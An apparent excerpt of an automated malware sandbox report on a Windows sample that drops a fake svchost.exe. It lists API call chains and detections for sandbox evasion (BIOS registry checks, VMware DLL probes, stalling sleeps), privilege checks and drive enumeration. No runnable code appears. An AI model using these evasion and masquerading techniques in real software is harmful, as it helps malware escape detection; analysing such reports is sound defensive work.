Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,8_2_01511170
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,8_2_0151D970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,8_2_01532B40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,8_2_01532BB0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,8_2_015325C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserNameA,memset,StrStrIA,8_2_0152ADE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,8_2_01531460
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,8_2_01533CE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,8_2_01533F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,8_2_01525720
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,8_2_01517FD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,8_2_01511660
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,8_2_01513610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,8_2_0152CE10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,8_2_01531690
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403A20
Found evasive API chain (may stop execution after checking volume information)
Source: C:\Users\user\Desktop\uavINoSIQh.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-30546
Found evasive API chain checking for user administrative privileges
Source: C:\Users\user\Desktop\uavINoSIQh.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-30579
Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-82782
Found stalling execution ending in API Sleep call
Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_2-82638
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026578A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_026578A0
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2986Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1266Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1293Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2780Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026579D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_026579D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_013379D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_013379D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013F79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_013F79D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015279D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,8_2_015279D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeAPI coverage: 2.5 %
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeAPI coverage: 2.6 %
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeAPI coverage: 2.2 %
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep count: 2986 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep time: -298600s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7784Thread sleep count: 1266 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7784Thread sleep time: -126600s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7788Thread sleep count: 1293 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7788Thread sleep time: -129300s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep count: 2780 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep time: -278000s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02669910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02669910
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02647680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02647680
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_0266DA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_0266DAE8
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0265D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_0265D120
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0265E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_0265E6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0133D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_0133D120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01349910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_01349910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0134DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_0134DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0134DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_0134DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0133E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_0133E6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01327680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_01327680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_013FD120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01409910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_01409910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0140DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0140DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_013FE6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_013E7680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01539910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_01539910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_0152D120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_0153DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_0153DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01517680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_01517680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_0152E6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266E0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_0266E0FB
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
